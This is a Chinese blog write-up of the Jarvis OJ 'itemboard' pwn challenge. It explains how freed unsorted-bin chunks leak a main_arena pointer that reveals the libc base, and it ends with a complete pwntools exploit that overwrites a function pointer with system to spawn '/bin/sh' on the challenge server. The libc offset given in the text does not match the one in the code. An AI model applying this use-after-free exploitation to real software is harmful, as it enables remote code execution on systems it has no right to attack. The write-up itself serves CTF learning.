UAF获取main_arena地址泄露libc基址

        linux中使用free()进行内存释放时,不大于 max_fast (默认值为 64B)的 chunk 被释放后,首先会被放到 fast bins中,大于max_fast的chunk或者fast bins 中的空闲 chunk 合并后会被放入unsorted bin中(参考glibc内存管理ptmalloc源码分析一文)

        而在fastbin为空时,unsortbin的fd和bk指向自身main_arena中,该地址的相对偏移值存放在libc.so中,可以通过use after free后打印出main_arena的实际地址,结合偏移值从而得到libc的加载地址。


Jarvis OJ一道pwn题itemboard作为一个栗子。

程序功能

新建item:

其中strcpy(item->description,buf)的时候存在一个栈溢出,可以实现任意地址写。

删除item:

查看set_null()实际上一个空函数,这里free之后没有把指针置空,可以通过uaf利用。

gdb-peda的checksec查了只有NX,但是实际调试发现有PIE。

0x01 泄露libc基址

linux中使用free()进行内存释放时,不大于 max_fast (默认值为 64B)的 chunk 被释放后,首先会被放到 fast bins中,大于max_fast的chunk或者fast bins 中的空闲 chunk 合并后会被放入unsorted bin中(参考glibc内存管理ptmalloc源码分析一文)

而在fastbin为空时,unsortbin的fd和bk指向自身main_arena中,该地址的相对偏移值存放在libc.so中,可以通过use after free后打印出main_arena的实际地址,结合偏移值从而得到libc的加载地址。

max_fast的默认值是64Bytes,调试里发现global_max_fast的值是0x80,也就是说先malloc一个0x80的内存

使用中的chunk

malloc返回给用户的地址实际上是mem指向的位置

接着free()释放

释放后的chunk

其中用户输入的数据被写上了fd和bk,都指向main_arena中的位置。

free前
free后

由于free后未把指针置零,我们仍然可以选择show_item功能打印description位置的数据,此时将打印出指向main_arena中的指针:

main_arena的基址存放在libc中的malloc_trim()函数中:

该libc的main_arena偏移位0x397b00,从而计算得到libc基址。

0x02 cat flag

接着利用uaf可以覆盖item->name,item->description和item->free,把item->free覆盖为system的地址,“/bin/sh”可以直接放在item起始位置,结尾处用“;”隔断,中间的description随意填充。


from pwn import *

p=remote('pwn2.jarvisoj.com',9887)

e=ELF('./libc-2.19.so')

def add(name,length,descript):

p.recvuntil('choose:')

p.sendline('1')

p.recvuntil('Item name?')

p.sendline(name)

p.recvuntil("Description's len?")

p.sendline(str(length))

p.recvuntil('Description?')

p.sendline(descript)

p.recvuntil('Add Item Successfully!')

def showitem(index):

p.recvuntil('choose:')

p.sendline('3')

p.recvuntil('Which item?')

p.sendline(str(index))

def remove(index):

p.recvuntil('choose:')

p.sendline('4')

p.recvuntil('Which item?')

p.sendline(str(index))

add('A'*30,0x80,'A'*8)

add('B'*30,0x80,'A'*8)

remove(0)

showitem(0)

p.recvuntil('Description:')

arena_addr=u64(p.recv(6).ljust(8,'\x00'))-88

libc_base=arena_addr-0x3be760

system_addr=libc_base+e.symbols['system']

print 'system address: ',hex(system_addr)

remove(1)

add('C'*30,32,'CCCC')

add('D'*30,32,'DDDD')

remove(2)

remove(3)

add('EEEE',24,'/bin/sh;'+'EEEEEEEE'+p64(system_addr))

remove(2)

p.interactive()

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 224,764评论 6 522
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 96,235评论 3 402
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 171,965评论 0 366
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 60,984评论 1 300
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 69,984评论 6 399
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 53,471评论 1 314
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 41,844评论 3 428
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 40,818评论 0 279
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 47,359评论 1 324
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 39,385评论 3 346
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 41,515评论 1 354
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 37,114评论 5 350
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 42,836评论 3 338
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 33,291评论 0 25
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 34,422评论 1 275
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 50,064评论 3 381
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 46,581评论 2 365

推荐阅读更多精彩内容